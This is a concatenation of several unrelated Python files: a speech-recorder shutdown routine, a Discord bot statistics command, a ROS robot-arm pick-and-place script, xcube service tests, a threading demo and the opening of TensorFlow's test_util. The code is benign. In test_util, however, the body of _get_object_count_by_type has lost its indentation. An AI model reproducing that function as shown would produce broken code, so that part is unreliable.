        # Terminate adintool processes
        if (not adintool_gui is None):
            adintool_gui.terminate()
            adintool_gui = None
        if (not adintool_exe is None):
            adintool_exe.terminate()
            adintool_exe = None

        # Clear busy status (!ready)
        qFunc.statusSet(self.fileBsy, False)
        if (str(self.id) == '0'):
            qFunc.statusSet(qBusy_s_inp, False)

        # Guide sound (shutdown chime)
        if (self.micGuide != 'off'):
            qFunc.guideSound('_down')

        # Drain both queues
        while (cn_r.qsize() > 0):
            cn_r_get = cn_r.get()
            cn_r.task_done()
        while (cn_s.qsize() > 0):
            cn_s_get = cn_s.get()
            cn_s.task_done()

    # Log
    qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
    qFunc.statusSet(self.fileRun, False)
    self.proc_beat = None
if __name__ == '__main__':
    # Shared helper classes
    qFunc.init()

    # Logging to a timestamped file
    nowTime = datetime.datetime.now()
    filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
    qLog.init(mode='logger', filename=filename, )

    # Initial setup: clear control file, reset speech status, kill stale recorders
    qFunc.remove(qCtrl_control_speech)
    qFunc.statusReset_speech(False)
    qFunc.kill('adintool')
    qFunc.kill('adintool-gui')

    # Parameters
    runMode = 'debug'
    if (len(sys.argv) >= 2):
        runMode = str(sys.argv[1]).lower()

    # Start the worker
    adintool_thread = proc_adintool('adintool', '0', runMode, )
    adintool_thread.begin()

    # Test run (no CLI args): poll status for ~15 seconds
    if (len(sys.argv) < 2):
        chktime = time.time()
        while ((time.time() - chktime) < 15):
            res_data = adintool_thread.get()
            res_name = res_data[0]
            res_value = res_data[1]
            if (res_name != ''):
                print(res_name, res_value, )
            if (adintool_thread.proc_s.qsize() == 0):
                adintool_thread.put(['_status_', ''])
            time.sleep(0.05)

    # Standalone run (CLI args given): run until the control file says '_end_'
    if (len(sys.argv) >= 2):

        # Wait loop
        while (True):

            # Termination check via the control file
            control = ''
            txts, txt = qFunc.txtsRead(qCtrl_control_speech)
            if (txts != False):
                qLog.log('info', str(txt))
                if (txt == '_end_'):
                    break
                else:
                    qFunc.remove(qCtrl_control_speech)
                    control = txt

            # Drain worker messages (currently discarded)
            res_data = adintool_thread.get()
            res_name = res_data[0]
            res_value = res_data[1]
            #if (res_name != ''):
            #    print(res_name, res_value, )

            time.sleep(0.50)

    # Shutdown
    adintool_thread.abort()
    del adintool_thread
    qFunc.kill('adintool')
    qFunc.kill('adintool-gui')
|
stats.py | from client import client
from datetime import datetime
import discord
import os
import socket
import threading
import time
# psutil is optional: without it the stats command simply omits host metrics
try:
    import psutil
except ModuleNotFoundError:
    has_psutil = False
else:
    has_psutil = True

cmd_name = "stats"

# Register the short and detailed help texts for this command
client.basic_help(title=cmd_name, desc=f"shows various running statistics of {client.bot_name}")
detailed_help = {
    "Usage": f"{client.default_prefix}{cmd_name}",
    "Description": f"This command shows different available statistics of {client.bot_name}, including servers, uptime, and commands run.",
    "Related": f"`{client.default_prefix} info` - shows information about {client.bot_name}",
}
client.long_help(cmd=cmd_name, mapping=detailed_help)
@client.ready
async def readier():
    """Prepare the background thread that primes psutil's CPU counters."""
    def psutil_update_thread_loop(client):
        # Sample CPU usage periodically so later cpu_percent() calls return
        # a meaningful interval-based value instead of 0.0
        while client.active:
            # self_process.cpu_percent() # not sure how to optimize this loop in another thread so we're going to comment it out and deal with it for now
            psutil.cpu_percent(percpu=True)
            time.sleep(5)
    global psutil_update_thread
    psutil_update_thread = threading.Thread(target=psutil_update_thread_loop, name="PSUtil_Background_Loop", args=[client])
    # NOTE(review): the thread is created here but never start()ed, and it is
    # not marked as a daemon — confirm a caller starts it via the global,
    # otherwise the sampling loop never runs. Also assumes psutil imported
    # successfully (has_psutil is True) — verify before enabling.
    return
@client.command(trigger=cmd_name, aliases=["statistics", "s"])
async def statistics(command: str, message: discord.Message):
    """Send an embed with uptime, server/command/message counters and, when
    psutil is available, host resource usage.

    Flags parsed from *command*: ``--uptime`` (short text reply only) and
    ``--hostname`` (include the host machine name field).
    """
    include_hostname = "--hostname" in command
    if "--uptime" in command:
        # Short form: plain-text uptime only, no embed
        up = time.perf_counter() - client.first_execution
        await message.channel.send(f"Uptime:\n`{up:.3f}` seconds\n`{up/86400:.4f}` days")
        return
    async with message.channel.typing():
        if has_psutil:
            try:
                # Sensor only exists on some hosts (e.g. Raspberry Pi)
                temp = psutil.sensors_temperatures()['cpu-thermal'][0].current
            except (AttributeError, KeyError):
                temp = None
            proc = psutil.Process()  # renamed from `self` (shadowed convention)
            cpu_self = proc.cpu_percent(interval=1)
            self_m_used = proc.memory_info().rss
            m_raw = psutil.virtual_memory()
            m_total = m_raw.total
            m_available = m_raw.available
            m_used = m_total - m_available
            cpu = psutil.cpu_percent(percpu=True)
            cpu_text = "".join(f"**CPU {i}:** {v}%\n" for i, v in enumerate(cpu))
        embed = discord.Embed(title=f"{client.bot_name} stats", description=discord.Embed.Empty, color=0x404040)
        up = time.perf_counter() - client.first_execution
        embed = embed.add_field(name="Uptime", value=f"{up:.3f} seconds\n{up/86400:.4f} days")
        embed = embed.add_field(name="Servers", value=len(client.guilds))
        embed = embed.add_field(name="Total commands run in all servers since last reboot", value=client.command_count, inline=False)
        # Fix: guard against ZeroDivisionError when no message has been
        # counted yet (previously crashed on the sec/message division)
        if client.message_count:
            mps = client.message_count / up
            msg_freq = up / client.message_count
            msg_text = f"{client.message_count} ({mps:.4f}/sec) ({msg_freq:.4f} sec/message)"
        else:
            msg_text = "0"
        embed = embed.add_field(name="Total messages sent in all servers since last reboot", value=msg_text, inline=False)
        n_connected = len(client.voice_clients)
        n_playing = len([x for x in client.voice_clients if x.is_playing()])
        embed = embed.add_field(name="Connected voice chats", value=f"{n_connected} ({n_playing} playing)")
        embed = embed.add_field(name="Bot Process ID", value=os.getpid())
        if include_hostname:
            embed = embed.add_field(name="Host Machine Name", value=socket.gethostname())
        if has_psutil:
            embed = embed.add_field(name="Host CPU temperature", value=f"{int(temp) if temp is not None else 'Unknown'}")
            embed = embed.add_field(name="Process Memory Usage", value=f"{self_m_used/(1024*1024):.3f} MiB")
            embed = embed.add_field(name="Process CPU Usage (relative to one core)", value=f"{cpu_self:.1f}%")
            embed = embed.add_field(name="System RAM Usage", value=f"{m_used/(1024*1024):.1f}/{m_total/(1024*1024):.1f} MiB ({(m_used/m_total)*100:.2f}%)")
            embed = embed.add_field(name="System CPU Usage", value=cpu_text, inline=False)
        embed = embed.set_footer(text=str(datetime.utcnow()))
        await message.channel.send(embed=embed)
|
pick_and_place_with_conveyor.py | #! /usr/bin/env python
'''
Controls a UR5 Robotic Arm to sort coloured boxes into bins from a conveyor.
'''
import rospy, geometry_msgs.msg, os, threading
from hrwros_gazebo.msg import LogicalCameraImage
from math import radians
from rospy.exceptions import ROSInterruptException
from lib import UR5MoveIt
Package_Pos = 0 # Stores the conveyor position of the detected box
MasterString = '' # String to store models' names from camera_callback()
Stop_var = False # Start-stop variable
def env_data():
    '''
    Data of all environment-specific parameters:
    1. Vacuum Gripper Width
    2. Box Size

    Returns:
        list: [box_length, vacuum_gripper_width] (metres).
    '''
    # Known physical dimensions of the scene objects (metres)
    dimensions = {
        'box_length': 0.15,           # Length of the box
        'vacuum_gripper_width': 0.117  # Vacuum Gripper Width
    }
    return [dimensions['box_length'],
            dimensions['vacuum_gripper_width']]
def joint_angles_data():
    '''
    Data of all joint angles required for various known positions:
    1. Home: Ready-position for picking objects off the conveyor
    2. Red Bin: Red Bin to place Red packages
    3. Green Bin: Green Bin to place Green packages
    4. Blue Bin: Blue Bin to place Blue packages

    Returns:
        list: [home, red_bin, green_bin, blue_bin], each a list of six
        joint angles in radians.
    '''
    # Joint targets expressed in degrees for readability;
    # converted to radians on return.
    home_deg = [180, -75, 110, -125, -90, 0]   # Home/Ready for picking
    red_deg = [65, -55, 80, -115, -90, 0]      # Red bin
    green_deg = [0, -55, 80, -115, -90, 0]     # Green bin
    blue_deg = [-95, -55, 80, -115, -90, 0]    # Blue bin
    return [[radians(a) for a in pose]
            for pose in (home_deg, red_deg, green_deg, blue_deg)]
def smart_stop():
    '''
    Multithreaded function for conveyor start-stop.

    The conveyor will first move at full speed until the first package is
    detected, then it will move at normal speed.
    '''
    global MasterString, Package_Pos, Stop_var
    counter = 0
    while(True):
        # Stop the belt when any known package is near the pick point
        if('packagen1' in MasterString or 'packagen2' in MasterString or 'packagen3' in MasterString) and (Package_Pos < 0.2):
            os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 0"')
            Stop_var = True
        else:
            if(counter == 0): # Until a package is detected, the conveyor will move at full speed
                os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
                counter = 1
            # NOTE(review): this service call runs on every iteration of a
            # tight loop with no sleep — it spawns a shell per pass and
            # hammers the service; consider issuing it only on state change.
            os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 30"')
def camera_callback(msg_camera):
    '''
    Callback function for Conveyor Logical Camera Subscriber.

    Records the type and conveyor y-position of the relevant detected model
    in the module-level MasterString / Package_Pos globals.

    Parameters:
        msg_camera (LogicalCameraImage): Data about all the objects detected
            by the Logical Camera.
    '''
    global MasterString, Package_Pos
    models = msg_camera.models
    if(models != []):
        # With a single detection use it directly; with several, the first
        # entry is the conveyor itself, so take the second.
        model = models[0] if len(models) == 1 else models[1]
        MasterString = model.type
        Package_Pos = model.pose.position.y
def pose_set(trans, rot):
    '''
    Assigns pose values w.r.t the world-frame to a PoseStamped object.

    Parameters:
        trans (float[]): Translation Values.
        rot (float[]): RPY Rotation Values.

    Returns:
        pose (geometry_msgs.msg.PoseStamped() object): The complete pose with values.
    '''
    # If you want to override any values, use this
    # NOTE(review): this override list is always non-empty, so the incoming
    # *rot* argument is unconditionally replaced by the hard-coded quaternion
    # below and the override is printed on every call — confirm this is
    # intentional (fixed gripper orientation) and not leftover debug code.
    override = [trans, [-0.5, -0.5, 0.5, 0.5]]
    if(override != []):
        trans = override[0]
        rot = override[1]
        print(override)
    pose = geometry_msgs.msg.PoseStamped()
    pose.header.frame_id = 'world'
    pose.pose.position.x = trans[0]
    pose.pose.position.y = trans[1]
    pose.pose.position.z = trans[2]
    pose.pose.orientation.x = rot[0]
    pose.pose.orientation.y = rot[1]
    pose.pose.orientation.z = rot[2]
    pose.pose.orientation.w = rot[3]
    return pose
def box_plan(box_name, box_length, vacuum_gripper_width):
    '''
    Pick-planning for the boxes.

    Looks up the detected box's camera TF frame, moves the end effector
    above it, activates the vacuum gripper and attaches the box in the
    planning scene.

    Parameters:
        box_name (str): The colour of the box detected ('R', 'G' or 'B').
        box_length (float): The size of the box.
        vacuum_gripper_width (float): The width of the vacuum gripper.
    '''
    # Offset for end effector placement: gripper sits on top of the box
    delta = vacuum_gripper_width + (box_length/2)

    # Per-colour data: (camera TF frame, ANSI colour code, display name).
    # The three original branches were identical apart from these values.
    box_info = {
        'R': ('/logical_camera_2_packagen1_frame', '\033[91m', 'Red'),
        'G': ('/logical_camera_2_packagen2_frame', '\033[92m', 'Green'),
        'B': ('/logical_camera_2_packagen3_frame', '\033[94m', 'Blue'),
    }
    if box_name not in box_info:
        return
    frame, colour_code, colour_name = box_info[box_name]

    try:
        # Obtaining the TF transform of the box
        (box_trans, box_rot) = ur5.tf_listener.lookupTransform("/world",
                                                               frame,
                                                               rospy.Time(0))
        # Execute pick operation
        box_pose = pose_set(box_trans, box_rot)                   # Collating pose values
        box_pose.pose.position.z = box_pose.pose.position.z + delta  # Adding Z Offset
        ur5.go_to_pose(box_pose)
        # Activate Vacuum Gripper
        os.system(
            'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: true"\n')
        # Add the box to the planning scene and attach it to the gripper
        box_pose.pose.position.z = box_pose.pose.position.z - delta  # Removing Z Offset
        ur5.add_box(box_name, box_length, box_pose)
        ur5.attach_box(box_name)
        # Log the operation
        rospy.loginfo(
            colour_code + colour_name + " Package Picked!" + '\033[0m')
    except Exception:
        # Fix: was a bare `except:` — catching Exception keeps the original
        # best-effort behaviour (a failed TF lookup aborts the pick) without
        # swallowing SystemExit/KeyboardInterrupt.
        return
def bin_plan(bin_name, bin_joint_angles):
    '''
    Place-planning for the bins.

    Moves to the requested bin, releases the vacuum gripper, and removes
    the carried box from the planning scene.

    Parameters:
        bin_name (str): The colour of the bin ('R', 'G' or 'B').
        bin_joint_angles (float[]): The joint angles of the required bin.
    '''
    # Per-colour log decoration; the place sequence itself is identical
    # for all three bins.
    bin_info = {
        'R': ('\033[91m', 'Red'),
        'G': ('\033[92m', 'Green'),
        'B': ('\033[94m', 'Blue'),
    }
    if bin_name not in bin_info:
        return
    colour_code, colour_name = bin_info[bin_name]

    # Set joint angles for the bin
    ur5.set_joint_angles(bin_joint_angles)
    # Deactivate the Gripper
    os.system(
        'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: false"\n')
    # Remove the box from the planning scene
    ur5.detach_box(bin_name)
    ur5.remove_box(bin_name)
    # Log the operation
    rospy.loginfo(
        colour_code + colour_name + " Package Placed!" + '\033[0m')
def subscriber_init():
    '''
    Definitions and setups of all Subscribers.
    '''
    # Subscriber for Conveyor Logical Camera; feeds camera_callback(),
    # which updates the MasterString/Package_Pos globals
    rospy.Subscriber('/eyrc/vb/logical_camera_2',
                     LogicalCameraImage,
                     camera_callback)
def controller():
    '''
    Executes the main operations: repeatedly picks whichever package the
    camera reported (once the conveyor has stopped) and places it in the
    matching bin; otherwise returns to the home position.
    '''
    global MasterString, Stop_var
    # Go to a home position in preparation for picking up the packages
    ur5.set_joint_angles(joint_angles[0])
    # Execute box-bin planning
    while(not rospy.is_shutdown()):
        try:
            if('packagen1' in MasterString) and Stop_var:     # Red box
                box_plan('R', env_values[0], env_values[1])   # Pick operation
                bin_plan('R', joint_angles[1])                # Place operation
                Stop_var = False
            elif('packagen2' in MasterString) and Stop_var:   # Green box
                box_plan('G', env_values[0], env_values[1])
                bin_plan('G', joint_angles[2])
                Stop_var = False
            elif('packagen3' in MasterString) and Stop_var:   # Blue box
                box_plan('B', env_values[0], env_values[1])
                bin_plan('B', joint_angles[3])
                Stop_var = False
            else:
                ur5.set_joint_angles(joint_angles[0])
        except rospy.ROSInterruptException:
            # Erase thread after execution
            # NOTE(review): smart_stop() loops forever, so join() here will
            # block indefinitely — confirm whether a stop flag for the
            # conveyor thread was intended instead.
            t.join()
if __name__ == '__main__':
    '''
    Controls overall execution.
    '''
    ur5 = UR5MoveIt()
    # Start the Subscribers
    subscriber_init()
    # Start the separate conveyor control thread
    # NOTE(review): the thread is not a daemon and runs an infinite loop, so
    # the process cannot exit cleanly after controller() returns — confirm.
    t = threading.Thread(target=smart_stop)
    t.start()
    # Obtain prerequisite data
    joint_angles = joint_angles_data()
    env_values = env_data()
    # Start execution
    controller()
|
test_service.py | import re
import unittest
from xcube.webapi.service import Service
from xcube.webapi.service import new_default_config
from xcube.webapi.service import url_pattern
class ServerMock:
    """Minimal stand-in for a tornado HTTP server: stop() is a no-op."""
    def stop(self):
        pass
class ApplicationMock:
    """Minimal stand-in for a tornado Application: listen() yields a ServerMock."""
    # noinspection PyMethodMayBeStatic,PyUnusedLocal
    def listen(self, port: int, address: str = "", **kwargs):
        return ServerMock()
class ServiceTest(unittest.TestCase):
    """Tests for Service construction, kwarg validation, and lifecycle."""

    def test_service_ok(self):
        # Plain construction attaches the service context to the application
        application = ApplicationMock()
        # noinspection PyTypeChecker
        service = Service(application)
        self.assertIs(application, service.application)
        self.assertTrue(hasattr(service.application, 'service_context'))
        self.assertTrue(hasattr(service.application, 'time_of_last_activity'))

    def test_service_deprecated(self):
        # Deprecated logging kwargs are still accepted without error
        application = ApplicationMock()
        # noinspection PyTypeChecker
        service = Service(application,
                          log_to_stderr=True,
                          log_file_prefix='log-')
        self.assertIs(application, service.application)

    def test_service_kwarg_validation(self):
        # config_file is mutually exclusive with each of these kwargs
        application = ApplicationMock()
        for k, v in dict(cube_paths=['test.zarr'],
                         styles=dict(a=2),
                         aws_prof='test',
                         aws_env=True).items():
            with self.assertRaises(ValueError) as cm:
                # noinspection PyTypeChecker
                Service(application,
                        config_file='server-conf.yaml',
                        **{k: v})
            self.assertEqual(f'config_file and {k} cannot be given both',
                             f'{cm.exception}')

    def test_start_and_stop(self):
        application = ApplicationMock()
        # noinspection PyTypeChecker
        service = Service(application)
        import threading
        # Test service.start() — run in a thread as it blocks on the IO loop
        thread = threading.Thread(target=service.start)
        thread.start()
        thread.join(timeout=0.1)
        self.assertIsInstance(service.server, ServerMock)
        # Test stop.stop()
        thread = threading.Thread(target=service.stop)
        thread.start()
        thread.join(timeout=0.1)
        # Test stop._on_shutdown() — clears the server reference
        thread = threading.Thread(target=service._on_shutdown)
        thread.start()
        thread.join(timeout=0.1)
        self.assertIsNone(service.server)
class DefaultConfigTest(unittest.TestCase):
    """Tests for new_default_config(): dataset and style generation."""

    def test_new_default_config(self):
        # Each cube path becomes a dataset entry; format is inferred from
        # the file extension, and styles map to colour-mapping entries.
        config = new_default_config(["/home/bibo/data/cube-1.zarr",
                                     "/home/bibo/data/cube-2.nc"],
                                    dict(conc_chl=(0.0, 20.0),
                                         conc_tsm=(0.0, 12.0, 'plasma')))
        self.assertEqual({
            'Datasets': [
                {
                    'FileSystem': 'file',
                    'Format': 'zarr',
                    'Identifier': 'dataset_1',
                    'Path': '/home/bibo/data/cube-1.zarr',
                    'Title': 'cube-1.zarr'
                },
                {
                    'FileSystem': 'file',
                    'Format': 'netcdf4',
                    'Identifier': 'dataset_2',
                    'Path': '/home/bibo/data/cube-2.nc',
                    'Title': 'cube-2.nc'
                }
            ],
            'Styles': [
                {'Identifier': 'default',
                 'ColorMappings': {
                     'conc_chl': {'ValueRange': [0.0, 20.0]},
                     'conc_tsm': {'ColorBar': 'plasma',
                                  'ValueRange': [0.0, 12.0]}},
                 }
            ]},
            config)
        # A scalar style value (not a range tuple) is rejected
        with self.assertRaises(ValueError) as cm:
            new_default_config(["/home/bibo/data/cube-1.zarr",
                                "/home/bibo/data/cube-2.nc"],
                               dict(conc_chl=20.0,
                                    conc_tsm=(0.0, 12.0, 'plasma')))
        self.assertEqual("illegal style: conc_chl=20.0", f"{cm.exception}")
class UrlPatternTest(unittest.TestCase):
    """Tests for the url_pattern() template-to-regex translator."""

    def test_url_pattern_works(self):
        """Compiled patterns must capture the declared path variables."""
        pattern = url_pattern('/open/{{id1}}ws/{{id2}}wf')
        match = re.fullmatch(pattern, '/open/34ws/a66wf')
        self.assertIsNotNone(match)
        self.assertEqual(match.groupdict(), {'id1': '34', 'id2': 'a66'})

        pattern = url_pattern('/open/ws{{id1}}/wf{{id2}}')
        match = re.fullmatch(pattern, '/open/ws34/wfa66')
        self.assertIsNotNone(match)
        self.assertEqual(match.groupdict(), {'id1': '34', 'id2': 'a66'})

        # Raw regex groups may be mixed with {{name}} templates.
        pattern = url_pattern('/datasets/{{ds_id}}/data.zarr/(?P<path>.*)')
        match = re.fullmatch(pattern, '/datasets/S2PLUS_2017/data.zarr/')
        self.assertIsNotNone(match)
        self.assertEqual(match.groupdict(),
                         {'ds_id': 'S2PLUS_2017', 'path': ''})
        match = re.fullmatch(pattern,
                             '/datasets/S2PLUS_2017/data.zarr/conc_chl/.zattrs')
        self.assertIsNotNone(match)
        self.assertEqual(match.groupdict(),
                         {'ds_id': 'S2PLUS_2017', 'path': 'conc_chl/.zattrs'})

        # Percent-encoded path segments must be captured verbatim.
        encoded_dir = ('C%3A%5CUsers%5CNorman%5CIdeaProjects%5Cccitools'
                       '%5Cect-core%5Ctest%5Cui%5CTEST_WS_3')
        pattern = url_pattern('/ws/{{base_dir}}/res/{{res_name}}/add')
        match = re.fullmatch(pattern, '/ws/%s/res/SST/add' % encoded_dir)
        self.assertIsNotNone(match)
        self.assertEqual(match.groupdict(),
                         {'base_dir': encoded_dir, 'res_name': 'SST'})

    def test_url_pattern_ok(self):
        """url_pattern() must translate {{name}} into named regex groups."""
        cases = [
            ('/version', '/version'),
            ('{{num}}/get',
             r'(?P<num>[^\;\/\?\:\@\&\=\+\$\,]+)/get'),
            ('/open/{{ws_name}}',
             r'/open/(?P<ws_name>[^\;\/\?\:\@\&\=\+\$\,]+)'),
            ('/open/ws{{id1}}/wf{{id2}}',
             r'/open/ws(?P<id1>[^\;\/\?\:\@\&\=\+\$\,]+)/wf(?P<id2>[^\;\/\?\:\@\&\=\+\$\,]+)'),
            ('/datasets/{{ds_id}}/data.zip/(.*)',
             r'/datasets/(?P<ds_id>[^\;\/\?\:\@\&\=\+\$\,]+)/data.zip/(.*)'),
        ]
        for template, expected in cases:
            self.assertEqual(expected, url_pattern(template))

    def test_url_pattern_fail(self):
        """Malformed templates must raise a descriptive ValueError."""
        with self.assertRaises(ValueError) as cm:
            url_pattern('/open/{{ws/name}}')
        self.assertEqual(
            str(cm.exception),
            'name in {{name}} must be a valid identifier, but got "ws/name"')
        with self.assertRaises(ValueError) as cm:
            url_pattern('/info/{{id}')
        self.assertEqual(str(cm.exception),
                         'no matching "}}" after "{{" in "/info/{{id}"')
|
main.py | from threading import RLock, Thread #RLock usado en caso de usar .acquiare por segunda vez desde el mismo hilo
from time import sleep
# Modulos propios ->Carpeta modulo
from modulos.agencia import agencia
from modulos.compania import compania
from modulos.cliente import cliente
if __name__ == "__main__":
    # Number of client threads to spawn.
    numClientes = 4

    hilosList = []    # client worker threads (kept so they can be joined)
    clienteList = []  # cliente objects driving each thread

    # Airline companies.
    aereomar = compania('Aeromar')
    aereomexico = compania('Aereomexico')
    interjet = compania('InterJet')
    volaris = compania('volaris')
    companiaList = [aereomar, aereomexico, interjet, volaris]

    # Travel agencies selling tickets for the companies above.
    coppel = agencia(companiaList, 'coppelViajes', numClientes)
    despegar = agencia(companiaList, 'despegar.com', numClientes)
    mundo = agencia(companiaList, "mundomex", numClientes)
    best = agencia(companiaList, 'bestday', numClientes)
    palacio = agencia(companiaList, 'viajesPalacio', numClientes)
    agenciaList = [coppel, despegar, mundo, best, palacio]

    for agencias in agenciaList:
        agencias.run()
    sleep(2)

    # Create clients and run one worker thread per client.
    for i in range(numClientes):
        nuevoCliente = cliente(agenciaList)
        clienteList.append(nuevoCliente)
        hilo = Thread(target=nuevoCliente.run)
        hilo.start()
        # BUG FIX: keep the Thread object itself; the original appended the
        # result of Thread.start(), which is always None, so the list of
        # threads was useless.
        hilosList.append(hilo)

    # Wait for every client thread to finish before the main thread exits.
    for hilo in hilosList:
        hilo.join()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util import traceback_utils
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
  """Default stub: XLA compilation is disabled unless overridden below."""
  return False
# Replace the stub above when the BUILD rule provides is_xla_test_true;
# any import failure simply keeps the default (XLA disabled).
try:
  from tensorflow.python.framework.is_xla_test_true import is_xla_enabled  # pylint: disable=g-import-not-at-top, unused-import
except Exception:  # pylint: disable=broad-except
  pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
  """Default stub: MLIR bridge state is unset unless overridden below."""
  return None
# Replace the stub above when a BUILD rule provides an explicit MLIR-bridge
# setting: the *_false module forces it off, the *_true module forces it on.
# If neither is available, the default (None) stands.
try:
  from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled  # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
  try:
    from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled  # pylint: disable=g-import-not-at-top, unused-import
  except ImportError:
    pass
# Thin wrappers exposing sanitizer build flags from the native
# pywrap_sanitizers module.


def is_asan_enabled():
  """Check if ASAN (AddressSanitizer) is enabled for this build."""
  return pywrap_sanitizers.is_asan_enabled()


def is_msan_enabled():
  """Check if MSAN (MemorySanitizer) is enabled for this build."""
  return pywrap_sanitizers.is_msan_enabled()


def is_tsan_enabled():
  """Check if TSAN (ThreadSanitizer) is enabled for this build."""
  return pywrap_sanitizers.is_tsan_enabled()


def is_ubsan_enabled():
  """Check if UBSAN (UndefinedBehaviorSanitizer) is enabled for this build."""
  return pywrap_sanitizers.is_ubsan_enabled()
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
  """Returns the name of a GPU device if available or an empty string.

  This method should only be used in tests written with `tf.test.TestCase`.

  >>> class MyTest(tf.test.TestCase):
  ...
  ...   def test_add_on_gpu(self):
  ...     if not tf.test.is_built_with_gpu_support():
  ...       self.skipTest("test is only applicable on GPU")
  ...
  ...     with tf.device(tf.test.gpu_device_name()):
  ...       self.assertEqual(tf.math.add(1.0, 2.0), 3.0)
  """
  gpu_names = (compat.as_str(device.name)
               for device in device_lib.list_local_devices()
               if device.device_type == "GPU")
  # First GPU wins; fall back to the empty string when none is present.
  return next(gpu_names, "")
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  found_nodes = {}
  graph_def = graph.as_graph_def()
  for node in graph_def.node:
    if node.name not in expected_ops:
      continue
    # Present but with the wrong op type is an error.
    if expected_ops[node.name] != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (node.name, expected_ops[node.name], node.op))
    found_nodes[node.name] = node
  if set(expected_ops.keys()) != set(found_nodes.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), found_nodes.keys()))
  return found_nodes
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering
  of nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent. This function
  ignores randomized attribute values that may appear in V2 checkpoints.

  Args:
    expected: The `GraphDef` we expected.
    actual: The `GraphDef` we have.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  # V2 semantics: always ignore checkpoint randomization and hash-table names.
  assert_equal_graph_def(actual, expected,
                         checkpoint_v2=True,
                         hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
                              hash_table_shared_name=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering
  of nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.
    hash_table_shared_name: boolean determining whether to ignore randomized
      shared_names that appear in HashTableV2 op defs.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
